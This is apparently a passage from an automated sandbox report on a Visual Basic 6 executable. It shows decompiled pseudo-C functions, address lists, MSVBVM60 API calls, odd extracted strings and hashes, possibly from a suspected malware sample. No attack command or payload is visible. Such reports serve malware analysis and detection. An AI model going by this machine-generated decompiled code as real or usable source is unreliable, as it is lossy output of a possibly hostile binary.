				L00401824();
				_t63 = _v184;
				if(_t63 != 0) {
					_v124 = 0x80020004;
					_v132 = 0xa;
					_v108 = 0x80020004;
					_v116 = 0xa;
					_v92 = 0x80020004;
					_v100 = 0xa;
					if( *0x435010 != 0) {
						_v200 = 0x435010;
					} else {
						_push(0x435010);
						_push(0x402614);
						L00401812();
						_v200 = 0x435010;
					}
					_t67 =  &_v68;
					L0040180C();
					_v184 = _t67;
					_t71 =  *((intOrPtr*)( *_v184 + 0x158))(_v184,  &_v64, _t67,  *((intOrPtr*)( *((intOrPtr*)( *_v200)) + 0x300))( *_v200));
					asm("fclex");
					_v188 = _t71;
					if(_v188 >= 0) {
						_v204 = _v204 & 0x00000000;
					} else {
						_push(0x158);
						_push(0x403568);
						_push(_v184);
						_push(_v188);
						L00401800();
						_v204 = _t71;
					}
					_v196 = _v64;
					_v64 = _v64 & 0x00000000;
					_v76 = _v196;
					_v84 = 8;
					_push( &_v132);
					_push( &_v116);
					_push( &_v100);
					_push(0);
					_push( &_v84);
					L00401752();
					L004017FA();
					_push( &_v132);
					_push( &_v116);
					_push( &_v100);
					_t63 =  &_v84;
					_push(_t63);
					_push(4);
					L00401842();
				}
				_push(0x42c99c);
				L00401824();
				L00401824();
				return _t63;
			}

0x0042c795
0x0042c7a0
0x0042c7a1
0x0042c7ad
0x0042c7b5
0x0042c7b8
0x0042c7c5
0x0042c7d0
0x0042c7d5
0x0042c7dc
0x0042c7e3
0x0042c7e6
0x0042c7e7
0x0042c7f1
0x0042c7f6
0x0042c7f7
0x0042c7fc
0x0042c803
0x0042c809
0x0042c813
0x0042c81b
0x0042c820
0x0042c829
0x0042c82f
0x0042c836
0x0042c83d
0x0042c844
0x0042c84b
0x0042c852
0x0042c860
0x0042c87d
0x0042c862
0x0042c862
0x0042c867
0x0042c86c
0x0042c871
0x0042c871
0x0042c8a1
0x0042c8a5
0x0042c8aa
0x0042c8c2
0x0042c8c8
0x0042c8ca
0x0042c8d7
0x0042c8fc
0x0042c8d9
0x0042c8d9
0x0042c8de
0x0042c8e3
0x0042c8e9
0x0042c8ef
0x0042c8f4
0x0042c8f4
0x0042c906
0x0042c90c
0x0042c916
0x0042c919
0x0042c923
0x0042c927
0x0042c92b
0x0042c92c
0x0042c931
0x0042c932
0x0042c93a
0x0042c942
0x0042c946
0x0042c94a
0x0042c94b
0x0042c94e
0x0042c94f
0x0042c951
0x0042c956
0x0042c959
0x0042c98e
0x0042c996
0x0042c99b

APIs

__vbaChkstk.MSVBVM60(?,004015F6), ref: 0042C7AD
__vbaVarDup.MSVBVM60(?,?,?,?,004015F6), ref: 0042C7C5
__vbaVarDup.MSVBVM60(?,?,?,?,004015F6), ref: 0042C7D0
#591.MSVBVM60(00000002), ref: 0042C7E7
__vbaStrMove.MSVBVM60(00000002), ref: 0042C7F1
__vbaStrCmp.MSVBVM60(Integer,00000000,00000002), ref: 0042C7FC
__vbaFreeStr.MSVBVM60(Integer,00000000,00000002), ref: 0042C813
__vbaFreeVar.MSVBVM60(Integer,00000000,00000002), ref: 0042C81B
__vbaNew2.MSVBVM60(00402614,00435010,?,?,?,?,?,?,?,?,?,Integer,00000000,00000002), ref: 0042C86C
__vbaObjSet.MSVBVM60(?,00000000), ref: 0042C8A5
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403568,00000158), ref: 0042C8EF
#595.MSVBVM60(00000008,00000000,0000000A,0000000A,0000000A), ref: 0042C932
__vbaFreeObj.MSVBVM60(00000008,00000000,0000000A,0000000A,0000000A), ref: 0042C93A
__vbaFreeVarList.MSVBVM60(00000004,00000008,0000000A,0000000A,0000000A,00000008,00000000,0000000A,0000000A,0000000A), ref: 0042C951
__vbaFreeVar.MSVBVM60(0042C99C,Integer,00000000,00000002), ref: 0042C98E
__vbaFreeVar.MSVBVM60(0042C99C,Integer,00000000,00000002), ref: 0042C996

Strings

Integer, xrefs: 0042C7F7
7T, xrefs: 0042C7D5

Memory Dump Source

Source File: 00000002.00000002.415101416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.415095592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.415131046.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.415136145.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$#591#595CheckChkstkHresultListMoveNew2
String ID: 7T$Integer
API String ID: 1959851190-872005640
Opcode ID: 69c7664a96633af5d8cbafe9b7a4a69d9cadb2dcf80a09602a27d30b81631d07
Instruction ID: 3f0e0cb11639740fc04a546489c5fd85f03088c30926e5c8308e5a9a70233306
Opcode Fuzzy Hash: 69c7664a96633af5d8cbafe9b7a4a69d9cadb2dcf80a09602a27d30b81631d07
Instruction Fuzzy Hash: 3D51FAB1900228EBDB14EF91CC85BEEB7B9BF04304F5041AAE105BB1A1DB785A49CF55

Uniqueness

Uniqueness Score: -1.00%

Function 004338B4, Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E004338B4(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				void* _v44;
				char _v60;
				char _v64;
				intOrPtr _v72;
				intOrPtr _v80;
				char* _v88;
				intOrPtr _v96;
				void* _v100;
				signed int _v104;
				char _v116;
				signed int _v120;
				signed int _t47;
				char* _t52;
				signed int _t60;
				void* _t79;
				void* _t81;
				intOrPtr _t82;

				_t82 = _t81 - 0xc;
				 *[fs:0x0] = _t82;
				L004015F0();
				_v16 = _t82;
				_v12 = 0x4015b0;
				_v8 = 0;
				_t47 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x60,  *[fs:0x0], 0x4015f6, _t79);
				L0040178E();
				_push(1);
				_push(0x4034b4);
				L004016A4();
				L0040183C();
				_push(_t47);
				_push(0x4034c0);
				L004017F4();
				asm("sbb eax, eax");
				_v100 =  ~( ~( ~_t47));
				L0040182A();
				if(_v100 != 0) {
					if( *0x435744 != 0) {
						_v116 = 0x435744;
					} else {
						_push(0x435744);
						_push(0x40342c);
						L00401812();
						_v116 = 0x435744;
					}
					_t15 =  &_v116; // 0x435744
					_v100 =  *((intOrPtr*)( *_t15));
					_v88 = L"MODALITET";
					_v96 = 8;
					_v72 = 0x4e;
					_v80 = 2;
					L004015F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					L004015F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t60 =  *((intOrPtr*)( *_v100 + 0x38))(_v100, 0x10, 0x10,  &_v60);
					asm("fclex");
					_v104 = _t60;
					if(_v104 >= 0) {
						_v120 = _v120 & 0x00000000;
					} else {
						_push(0x38);
						_push(0x40341c);
						_push(_v100);
						_push(_v104);
						L00401800();
						_v120 = _t60;
					}
					_push( &_v60);
					_push( &_v64);
					L00401698();
					_push( &_v64);
					_push( &_v40);
					L0040169E();
					L00401824();
				}
				_v36 = 0x9e763b80;
				_v32 = 0x5b06;
				_push(0x433a4a);
				L0040182A();
				_t52 =  &_v40;
				_push(_t52);
				_push(0);
				L00401722();
				return _t52;
			}

0x004338b7
0x004338c6
0x004338d0
0x004338d8
0x004338db
0x004338e2
0x004338f1
0x004338fa
0x004338ff
0x00433901
0x00433906
0x00433910
0x00433915
0x00433916
0x0043391b
0x00433922
0x00433928
0x0043392f
0x0043393a
0x00433947
0x00433961
0x00433949
0x00433949
0x0043394e
0x00433953
0x00433958
0x00433958
0x00433968
0x0043396d
0x00433970
0x00433977
0x0043397e
0x00433985
0x00433993
0x0043399d
0x0043399e
0x0043399f
0x004339a0
0x004339a4
0x004339ae
0x004339af
0x004339b0
0x004339b1
0x004339ba
0x004339bd
0x004339bf
0x004339c6
0x004339df
0x004339c8
0x004339c8
0x004339ca
0x004339cf
0x004339d2
0x004339d5
0x004339da
0x004339da
0x004339e6
0x004339ea
0x004339eb
0x004339f3
0x004339f7
0x004339f8
0x00433a00
0x00433a00
0x00433a05
0x00433a0c
0x00433a13
0x00433a39
0x00433a3e
0x00433a41
0x00433a42
0x00433a44
0x00433a49

APIs

__vbaChkstk.MSVBVM60(?,004015F6), ref: 004338D0
__vbaStrCopy.MSVBVM60(?,?,?,?,004015F6), ref: 004338FA
#616.MSVBVM60(004034B4,00000001,?,?,?,?,004015F6), ref: 00433906
__vbaStrMove.MSVBVM60(004034B4,00000001,?,?,?,?,004015F6), ref: 00433910
__vbaStrCmp.MSVBVM60(004034C0,00000000,004034B4,00000001,?,?,?,?,004015F6), ref: 0043391B
__vbaFreeStr.MSVBVM60(004034C0,00000000,004034B4,00000001,?,?,?,?,004015F6), ref: 0043392F
__vbaNew2.MSVBVM60(0040342C,00435744,004034C0,00000000,004034B4,00000001,?,?,?,?,004015F6), ref: 00433953
__vbaChkstk.MSVBVM60(?), ref: 00433993
__vbaChkstk.MSVBVM60(?), ref: 004339A4
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040341C,00000038), ref: 004339D5
__vbaVar2Vec.MSVBVM60(?,?), ref: 004339EB
__vbaAryMove.MSVBVM60(00000001,?,?,?), ref: 004339F8
__vbaFreeVar.MSVBVM60(00000001,?,?,?), ref: 00433A00
__vbaFreeStr.MSVBVM60(00433A4A,004034C0,00000000,004034B4,00000001), ref: 00433A39
__vbaAryDestruct.MSVBVM60(00000000,00000001,00433A4A,004034C0,00000000,004034B4,00000001), ref: 00433A44

Strings

MODALITET, xrefs: 00433970
N, xrefs: 0043397E
DWC, xrefs: 00433968

Memory Dump Source

Source File: 00000002.00000002.415101416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.415095592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.415131046.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.415136145.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$ChkstkFree$Move$#616CheckCopyDestructHresultNew2Var2
String ID: DWC$MODALITET$N
API String ID: 283268969-458913547
Opcode ID: 267c3af42458913cbc3da0939811b4dec9474f8f6126fdc0681b1f15557b0b4c
Instruction ID: cc4dc792e63fb5f54ac8b6b3ff6212805f390041fd5581962954760f1e82c364
Opcode Fuzzy Hash: 267c3af42458913cbc3da0939811b4dec9474f8f6126fdc0681b1f15557b0b4c
Instruction Fuzzy Hash: 4E412D7194060CEBCB11EF91C846BDEBBB9AF08704F10512AF501BB1E1DBB99A05CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00432D55, Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 109
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E00432D55(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4, void* _a12, void* _a28) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v40;
				void* _v56;
				void* _v60;
				char _v76;
				intOrPtr _v84;
				intOrPtr _v92;
				void* _v96;
				signed int _v100;
				intOrPtr* _v104;
				signed int _v108;
				char _v116;
				signed int _v120;
				signed int _v124;
				char* _t54;
				signed int _t55;
				signed int _t61;
				intOrPtr _t87;

				_push(0x4015f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t87;
				_push(0x68);
				L004015F0();
				_v12 = _t87;
				_v8 = 0x4014f0;
				L00401794();
				L00401794();
				_v84 = _a4;
				_v92 = 9;
				L00401794();
				_t54 =  &_v76;
				_push(_t54);
				L004016F2();
				_v96 =  ~(0 | _t54 != 0x0000ffff);
				L00401824();
				_t55 = _v96;
				if(_t55 != 0) {
					if( *0x435744 != 0) {
						_v116 = 0x435744;
					} else {
						_push(0x435744);
						_push(0x40342c);
						L00401812();
						_v116 = 0x435744;
					}
					_t20 =  &_v116; // 0x435744
					_v96 =  *((intOrPtr*)( *_t20));
					_t61 =  *((intOrPtr*)( *_v96 + 0x1c))(_v96,  &_v60);
					asm("fclex");
					_v100 = _t61;
					if(_v100 >= 0) {
						_v120 = _v120 & 0x00000000;
					} else {
						_push(0x1c);
						_push(0x40341c);
						_push(_v96);
						_push(_v100);
						L00401800();
						_v120 = _t61;
					}
					_v104 = _v60;
					_v84 = 0x80020004;
					_v92 = 0xa;
					L004015F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t55 =  *((intOrPtr*)( *_v104 + 0x60))(_v104, L"Suckfish", 0x10);
					asm("fclex");
					_v108 = _t55;
					if(_v108 >= 0) {
						_v124 = _v124 & 0x00000000;
					} else {
						_push(0x60);
						_push(0x403558);
						_push(_v104);
						_push(_v108);
						L00401800();
						_v124 = _t55;
					}
					L004017FA();
				}
				_push(0x432ecd);
				L00401824();
				L00401824();
				return _t55;
			}

0x00432d5a
0x00432d65
0x00432d66
0x00432d6d
0x00432d70
0x00432d78
0x00432d7b
0x00432d88
0x00432d93
0x00432d9b
0x00432d9e
0x00432dab
0x00432db0
0x00432db3
0x00432db4
0x00432dc4
0x00432dcb
0x00432dd0
0x00432dd6
0x00432de3
0x00432dfd
0x00432de5
0x00432de5
0x00432dea
0x00432def
0x00432df4
0x00432df4
0x00432e04
0x00432e09
0x00432e18
0x00432e1b
0x00432e1d
0x00432e24
0x00432e3d
0x00432e26
0x00432e26
0x00432e28
0x00432e2d
0x00432e30
0x00432e33
0x00432e38
0x00432e38
0x00432e44
0x00432e47
0x00432e4e
0x00432e58
0x00432e62
0x00432e63
0x00432e64
0x00432e65
0x00432e73
0x00432e76
0x00432e78
0x00432e7f
0x00432e98
0x00432e81
0x00432e81
0x00432e83
0x00432e88
0x00432e8b
0x00432e8e
0x00432e93
0x00432e93
0x00432e9f
0x00432e9f
0x00432ea4
0x00432ebf
0x00432ec7
0x00432ecc

APIs

__vbaChkstk.MSVBVM60(?,004015F6), ref: 00432D70
__vbaVarDup.MSVBVM60(?,?,?,?,004015F6), ref: 00432D88
__vbaVarDup.MSVBVM60(?,?,?,?,004015F6), ref: 00432D93
__vbaVarDup.MSVBVM60 ref: 00432DAB
#562.MSVBVM60(?), ref: 00432DB4
__vbaFreeVar.MSVBVM60(?), ref: 00432DCB
__vbaNew2.MSVBVM60(0040342C,00435744,?), ref: 00432DEF
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040341C,0000001C,?,?,?,?,?,?), ref: 00432E33
__vbaChkstk.MSVBVM60(?,?,?,?,?,?), ref: 00432E58
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403558,00000060,?,?,?,?,?,?), ref: 00432E8E
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?), ref: 00432E9F
__vbaFreeVar.MSVBVM60(00432ECD,?), ref: 00432EBF
__vbaFreeVar.MSVBVM60(00432ECD,?), ref: 00432EC7

Strings

Suckfish, xrefs: 00432E66
DWC, xrefs: 00432E04

Memory Dump Source

Source File: 00000002.00000002.415101416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.415095592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.415131046.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.415136145.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckChkstkHresult$#562New2
String ID: DWC$Suckfish
API String ID: 831914186-2834187877
Opcode ID: b9bf098c56f00c37b0a064957b48b8ccc898b4b0932b5b2808e073d5d08fe245
Instruction ID: 45791e5900962458faea8a94bd198946699b1aacf3f970f873eae3cb560be5a9
Opcode Fuzzy Hash: b9bf098c56f00c37b0a064957b48b8ccc898b4b0932b5b2808e073d5d08fe245
Instruction Fuzzy Hash: 8A410471900248EFDF00EFA5C946BDDBBB5BF08705F20402AF005BB2A1D7B85A4ADB58

Uniqueness

Uniqueness Score: -1.00%

Function 00433A77, Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 105
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E00433A77(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v36;
				char _v52;
				char _v68;
				char _v84;
				long long _v92;
				char _v100;
				signed int _v104;
				signed int _v112;
				char* _t33;
				signed short _t34;
				char* _t40;
				char* _t42;
				char* _t43;
				char* _t45;
				signed int _t48;
				intOrPtr _t57;
				void* _t60;
				long long _t66;

				_push(__ecx);
				_push(__ecx);
				_push(0x4015f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t57;
				_push(0x5c);
				L004015F0();
				_v12 = _t57;
				_v8 = 0x4015c8;
				_push(0);
				_push(L"Style");
				_push(0);
				_push(L"Opsione15");
				_push( &_v36);
				_t33 =  &_v52;
				_push(_t33);
				L00401830();
				_push(_t33);
				_t34 =  &_v68;
				_push(_t34);
				L00401830();
				_push(_t34);
				L00401692();
				asm("sbb eax, eax");
				_v104 =  ~( ~( ~_t34));
				_push( &_v68);
				_push( &_v52);
				_push(2);
				L00401842();
				_t60 = _t57 + 0x2c;
				_t40 = _v104;
				if(_t40 != 0) {
					_t66 =  *0x4015c0;
					_v92 = _t66;
					_v100 = 5;
					_t42 =  &_v52;
					L00401830();
					_t43 =  &_v68;
					L004017E8();
					_t45 =  &_v84;
					L0040168C();
					L004016B0();
					 *((intOrPtr*)(_t60 + 0x20)) = _t66;
					_t48 =  *((intOrPtr*)( *_a4 + 0x84))(_a4, __ecx, _t45, _t45,  &_v100, _t43, _t43, _t42, _t42,  &_v36, L"Opsione15", 0, L"MaskColor", 0);
					asm("fclex");
					_v104 = _t48;
					if(_v104 >= 0) {
						_v112 = _v112 & 0x00000000;
					} else {
						_push(0x84);
						_push(0x4031f4);
						_push(_a4);
						_push(_v104);
						L00401800();
						_v112 = _t48;
					}
					_push( &_v68);
					_t40 =  &_v52;
					_push(_t40);
					_push(2);
					L00401842();
				}
				asm("wait");
				_push(0x433bc4);
				L00401824();
				return _t40;
			}

0x00433a7a
0x00433a7b
0x00433a7c
0x00433a87
0x00433a88
0x00433a8f
0x00433a92
0x00433a9a
0x00433a9d
0x00433aa4
0x00433aa6
0x00433aab
0x00433aad
0x00433ab5
0x00433ab6
0x00433ab9
0x00433aba
0x00433ac2
0x00433ac3
0x00433ac6
0x00433ac7
0x00433acf
0x00433ad0
0x00433ad8
0x00433ade
0x00433ae5
0x00433ae9
0x00433aea
0x00433aec
0x00433af1
0x00433af4
0x00433afa
0x00433b00
0x00433b06
0x00433b09
0x00433b22
0x00433b26
0x00433b2f
0x00433b33
0x00433b40
0x00433b44
0x00433b4a
0x00433b50
0x00433b5b
0x00433b61
0x00433b63
0x00433b6a
0x00433b86
0x00433b6c
0x00433b6c
0x00433b71
0x00433b76
0x00433b79
0x00433b7c
0x00433b81
0x00433b81
0x00433b8d
0x00433b8e
0x00433b91
0x00433b92
0x00433b94
0x00433b99
0x00433b9c
0x00433b9d
0x00433bbe
0x00433bc3

APIs

__vbaChkstk.MSVBVM60(?,004015F6), ref: 00433A92
__vbaVarLateMemCallLdRf.MSVBVM60(?,?,Opsione15,00000000,Style,00000000,?,?,?,?,004015F6), ref: 00433ABA
__vbaVarLateMemCallLdRf.MSVBVM60(?,00000000), ref: 00433AC7
#592.MSVBVM60(00000000), ref: 00433AD0
__vbaFreeVarList.MSVBVM60(00000002,?,?,00000000), ref: 00433AEC
__vbaVarLateMemCallLdRf.MSVBVM60(?,?,Opsione15,00000000,MaskColor,00000000), ref: 00433B26
__vbaVarLateMemCallLd.MSVBVM60(00000000,00000000,?,?,?,?,?,?,00000000), ref: 00433B33
__vbaVarMul.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00433B44
__vbaR4Var.MSVBVM60(00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00433B4A
__vbaHresultCheckObj.MSVBVM60(00000000,?,004031F4,00000084), ref: 00433B7C
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 00433B94
__vbaFreeVar.MSVBVM60(00433BC4,?,?,00000000), ref: 00433BBE

Strings

Style, xrefs: 00433AA6
MaskColor, xrefs: 00433B12
Opsione15, xrefs: 00433AAD, 00433B19

Memory Dump Source

Source File: 00000002.00000002.415101416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.415095592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.415131046.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.415136145.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CallLate$Free$List$#592CheckChkstkHresult
String ID: MaskColor$Opsione15$Style
API String ID: 2230081280-969002151
Opcode ID: 23f9f18946deff97925c84c560e1b2dc7ea6ee55d3307748b621682ec7f78447
Instruction ID: 8dbae1f879ad3a96570e82eb62d7d09a18d0dcd5b70a24d6514d907204d22328
Opcode Fuzzy Hash: 23f9f18946deff97925c84c560e1b2dc7ea6ee55d3307748b621682ec7f78447
Instruction Fuzzy Hash: 313141B2940218BADB00EFD1CC46FEEB7BCAB04744F14452BF105BB1D2EA7996148B68

Uniqueness

Uniqueness Score: -1.00%

Function 00427604, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 132
COMMON

Download Yara Rule

C-Code - Quality: 41%

			E00427604(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, char __fp0) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				char _v40;
				char _v48;
				char _v56;
				char _v64;
				char _v72;
				intOrPtr _v80;
				char _v88;
				intOrPtr _v96;
				char _v104;
				intOrPtr _v112;
				char _v120;
				intOrPtr _v128;
				char _v136;
				intOrPtr _v144;
				char _v152;
				intOrPtr _v160;
				char _v168;
				short _v268;
				signed int _v276;
				char* _t57;
				char* _t65;
				char* _t66;
				intOrPtr _t84;

				_push(0x4015f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t84;
				L004015F0();
				_v12 = _t84;
				_v8 = 0x4011b8;
				_v64 = 0x80020004;
				_v72 = 0xa;
				_v48 = 0x80020004;
				_v56 = 0xa;
				_push( &_v72);
				_push( &_v56);
				asm("fld1");
				_v48 = __fp0;
				asm("fld1");
				_v56 = __fp0;
				asm("fld1");
				_v64 = __fp0;
				asm("fld1");
				_v72 = __fp0;
				L00401848();
				L0040184E();
				asm("fcomp qword [0x4011b0]");
				asm("fnstsw ax");
				asm("sahf");
				if(__eflags == 0) {
					_t10 =  &_v276;
					 *_t10 = _v276 & 0x00000000;
					__eflags =  *_t10;
				} else {
					_v276 = 1;
				}
				_v268 =  ~_v276;
				_push( &_v72);
				_push( &_v56);
				_push(2);
				L00401842();
				_t57 = _v268;
				if(_t57 != 0) {
					_v160 = 0x80020004;
					_v168 = 0xa;
					_v144 = 0x80020004;
					_v152 = 0xa;
					_v128 = 0x80020004;
					_v136 = 0xa;
					_v112 = 0x80020004;
					_v120 = 0xa;
					_v96 = 0x80020004;
					_v104 = 0xa;
					_v80 = 0x80020004;
					_v88 = 0xa;
					_push( &_v168);
					_push( &_v152);
					_push( &_v136);
					_push( &_v120);
					_push( &_v104);
					_push( &_v88);
					_push(0);
					_push(L"Name");
					_push(0);
					_push(L"Opsione18");
					_push( &_v40);
					_t65 =  &_v56;
					_push(_t65);
					L00401830();
					_push(_t65);
					_t66 =  &_v72;
					_push(_t66);
					L00401830();
					_push(_t66);
					L00401836();
					L0040183C();
					_push( &_v168);
					_push( &_v152);
					_push( &_v136);
					_push( &_v120);
					_push( &_v104);
					_push( &_v88);
					_push( &_v72);
					_t57 =  &_v56;
					_push(_t57);
					_push(8);
					L00401842();
				}
				asm("wait");
				_push(0x42780a);
				L0040182A();
				L00401824();
				return _t57;
			}

0x00427609
0x00427614
0x00427615
0x00427621
0x00427629
0x0042762c
0x00427633
0x0042763a
0x00427641
0x00427648
0x00427652
0x00427656
0x00427657
0x0042765b
0x0042765e
0x00427662
0x00427665
0x00427669
0x0042766c
0x00427670
0x00427673
0x00427678
0x0042767d
0x00427683
0x00427685
0x00427686
0x00427694
0x00427694
0x00427694
0x00427688
0x00427688
0x00427688
0x004276a3
0x004276ad
0x004276b1
0x004276b2
0x004276b4
0x004276bc
0x004276c5
0x004276cb
0x004276d5
0x004276df
0x004276e9
0x004276f3
0x004276fa
0x00427704
0x0042770b
0x00427712
0x00427719
0x00427720
0x00427727
0x00427734
0x0042773b
0x00427742
0x00427746
0x0042774a
0x0042774e
0x0042774f
0x00427751
0x00427756
0x00427758
0x00427760
0x00427761
0x00427764
0x00427765
0x0042776d
0x0042776e
0x00427771
0x00427772
0x0042777a
0x0042777b
0x00427785
0x00427790
0x00427797
0x0042779e
0x004277a2
0x004277a6
0x004277aa
0x004277ae
0x004277af
0x004277b2
0x004277b3
0x004277b5
0x004277ba
0x004277bd
0x004277be
0x004277fc
0x00427804
0x00427809

APIs

__vbaChkstk.MSVBVM60(?,004015F6), ref: 00427621
#675.MSVBVM60(?,?,?,?,?,?,?,?,0000000A,0000000A), ref: 00427673
__vbaFpR8.MSVBVM60(?,?,?,?,?,?,?,?,0000000A,0000000A), ref: 00427678
__vbaFreeVarList.MSVBVM60(00000002,0000000A,0000000A), ref: 004276B4
__vbaVarLateMemCallLdRf.MSVBVM60(?,?,Opsione18,00000000,Name,00000000,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A), ref: 00427765
__vbaVarLateMemCallLdRf.MSVBVM60(?,00000000), ref: 00427772
#596.MSVBVM60(00000000), ref: 0042777B
__vbaStrMove.MSVBVM60(00000000), ref: 00427785
__vbaFreeVarList.MSVBVM60(00000008,?,?,?,?,?,?,?,?,00000000), ref: 004277B5
__vbaFreeStr.MSVBVM60(0042780A), ref: 004277FC
__vbaFreeVar.MSVBVM60(0042780A), ref: 00427804

Strings

xB, xrefs: 0042774B, 0042774E
Name, xrefs: 00427751
Opsione18, xrefs: 00427758

Memory Dump Source

Source File: 00000002.00000002.415101416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.415095592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.415131046.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.415136145.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CallLateList$#596#675ChkstkMove
String ID: xB$Name$Opsione18
API String ID: 362768541-3943320062
Opcode ID: 8a76a3a45936b5560bd7114f97d4c31c9e7bb061c249d746926bfaa8f4c31782
Instruction ID: 97dd33ceb139caea629c87bca15a88436f2b3073ea167ff4ba66be7c106b1c72
Opcode Fuzzy Hash: 8a76a3a45936b5560bd7114f97d4c31c9e7bb061c249d746926bfaa8f4c31782
Instruction Fuzzy Hash: 4A510FF294020CAADB11DF91DD85FDEB7BCEB04700F20416AF245A6181EBB96B44CF65

Uniqueness

Uniqueness Score: -1.00%

Function 0042781D, Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0042781D(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v24;
				char _v28;
				char _v44;
				signed int _v68;
				char _v76;
				void* _v80;
				signed int _v84;
				char _v92;
				signed int _v96;
				short _t34;
				signed int _t35;
				intOrPtr _t37;
				char* _t38;
				intOrPtr _t50;

				_push(0x4015f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t50;
				_push(0x4c);
				L004015F0();
				_v12 = _t50;
				_v8 = 0x4011c8;
				_push(L"HEKTOMETEREN");
				_push(L"Barer");
				_push( &_v44);
				L00401818();
				_v68 = _v68 & 0x00000000;
				_v76 = 0x8008;
				_push( &_v44);
				_t34 =  &_v76;
				_push(_t34);
				L0040181E();
				_v80 = _t34;
				L00401824();
				_t35 = _v80;
				if(_t35 != 0) {
					if( *0x435744 != 0) {
						_v92 = 0x435744;
					} else {
						_push(0x435744);
						_push(0x40342c);
						L00401812();
						_v92 = 0x435744;
					}
					_t14 =  &_v92; // 0x435744
					_t37 =  *((intOrPtr*)( *_t14));
					_v80 = _t37;
					L00401806();
					_t38 =  &_v28;
					L0040180C();
					_t35 =  *((intOrPtr*)( *_v80 + 0x40))(_v80, _t38, _t38, _t37, _v24, 0x403260,  &M004033F8);
					asm("fclex");
					_v84 = _t35;
					if(_v84 >= 0) {
						_v96 = _v96 & 0x00000000;
					} else {
						_push(0x40);
						_push(0x40341c);
						_push(_v80);
						_push(_v84);
						L00401800();
						_v96 = _t35;
					}
					L004017FA();
				}
				_push(0x42793e);
				L004017FA();
				return _t35;
			}

0x00427822
0x0042782d
0x0042782e
0x00427835
0x00427838
0x00427840
0x00427843
0x0042784a
0x0042784f
0x00427857
0x00427858
0x0042785d
0x00427861
0x0042786b
0x0042786c
0x0042786f
0x00427870
0x00427875
0x0042787c
0x00427881
0x00427887
0x00427894
0x004278ae
0x00427896
0x00427896
0x0042789b
0x004278a0
0x004278a5
0x004278a5
0x004278b5
0x004278b8
0x004278ba
0x004278ca
0x004278d0
0x004278d4
0x004278e2
0x004278e5
0x004278e7
0x004278ee
0x00427907
0x004278f0
0x004278f0
0x004278f2
0x004278f7
0x004278fa
0x004278fd
0x00427902
0x00427902
0x0042790e
0x0042790e
0x00427913
0x00427938
0x0042793d

APIs

__vbaChkstk.MSVBVM60(?,004015F6), ref: 00427838
#692.MSVBVM60(?,Barer,HEKTOMETEREN,?,?,?,?,004015F6), ref: 00427858
__vbaVarTstNe.MSVBVM60(00008008,?,?,?,?,?,?,?,?,?,?,Barer,HEKTOMETEREN), ref: 00427870
